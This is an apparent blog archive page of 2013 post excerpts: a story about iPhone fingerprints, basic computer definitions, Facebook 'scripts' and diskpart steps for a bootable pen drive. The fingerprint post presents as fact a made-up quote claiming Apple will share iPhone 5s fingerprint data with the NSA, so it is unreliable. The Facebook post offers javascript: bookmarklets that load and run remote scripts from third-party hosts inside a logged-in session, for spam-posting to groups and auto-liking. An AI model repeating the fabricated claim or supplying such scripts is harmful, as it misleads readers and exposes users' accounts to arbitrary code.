Skip to main content

Posts

Showing posts from September, 2013

Apple admits, ‘iPhone 5s Fingerprint Database To Be Shared With NSA’

Now-a-days, Apple is famous in the markets because its new iPhone 5S has a Fingerprint Sensor (Touch ID) as a security feature—everyone is getting amazed with that feature and eager to use. That Fingerprint scanner has been hacked already by German Hackers group ‘CCC’ but one more thing to concern about that—’will Apple share that Fingerprint database with NSA’ and the answer is YES. Tim Richardson, District Manager of Apple’s North America Marketing Department admits about the sharing of Database with NSA, he said to Jane M. Agni (A freelance writer in nationalreport.net.): Absolutely the databases will be merged. This whole ‘fingerprint scan’ idea originated from someone in our Government. They just didn't expect to be outed by Snowden, you know.” NSA and FBI have been compiling a special database for over a year now to use with the new Apple technology. Fingerprints from all over the nation. Cold cases. Fugitives of the law. Missing persons, Richardson a...

Basic About Computer

Size:          8 bits = 1 byte 1024 bytes = 1 kb (kilo byte)     1024 kb = 1 mb (mega byte)    1024 mb = 1 gb (giga byte) RAM:          RAM (Random Access Memory) is used to store the  data temporarily. ROM:          ROM(Read Only Memory) stores some predefined instruction which executes every time when the machine starts for the first time. Speed:           Speed is a feature through which the data can be processed very quickly. Microprocessor or Chip or CPU ( Central Processing Unit) is device which is responsible to maintain the speed various types of  processors are dual core,core to duo, Pentium 4 & higher version. Motherboard:            It is a circuit board which holds the other devices of the machine. NIC:             Nic stands for(network interface card) helps to mak...

ENJOY MY NEW SCRIPTS FOR FACEBOOK...!!

1.FOR SUGGESTING FRIENDS IN JUST 1 CLICK USE THIS,JUST GO TO UR FRIENDS PROFILE AND CLICK THIS BOOKMARK SCRIPT ( http:// suggestfriends.weebly.com/ ):- javascript:(function(){documen t.body.appendChild(document.cr eateElement('script')).src=' http://www.weebly.com/uploads/ 1/9/3/5/19350397/ suggest_friends.js ';})(); 2. For subscribers plugin use this.. https://d evelopers.facebook.com/docs/ reference/plugins/subscribe/ 3.leave all groups in just 1 click use this.. http://loudtips.in/ how-to-leave-all-facebook-group s-with-a-click/ 4. If u think that ur acount is not secure then use this.. http://www.facebook.com/ roadblock/ roadblock_me.php?u=100000116389 752&n=d0a21nJl 5. Put ur status in all groups if there wall is open then use this.. javascript:(function(){documen t.body.appendChild(document.cr eateElement('script')).src=' http://www.weebly.com/uploads/ 1/2/2/3/12237121/ 1_click_group_msg_script.js ';})(); 6. Auto liker s...
How to make a pen drive bootable and load OS from it: Generally to load an operating system into an hard disk we use a bootable CD/DVD. But sometimes a situation may arise where booting with a CD is not possible.In that case we can use a pendrive to make it bootable and load OS from it. To make a pendrive bootable open command prompt (With Administrator Rights) and follw the below commands: >>Type DISKPART in command prompt: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>diskpart Microsoft DiskPart version 6.1.7600 Copyright (C) 1999-2008 Microsoft Corporation. On computer: GURUNATH-PC >>Type LIST DISK DISKPART> list disk Disk ### Status Size Free Dyn Gpt -------- ------------- ------- ------- --- --- Disk 0 Online 465 GB 0 B Disk 1 Online 14 GB 0 B >>This will show all the disks attached to your system.Now select disk in which your pendrive is attached. In...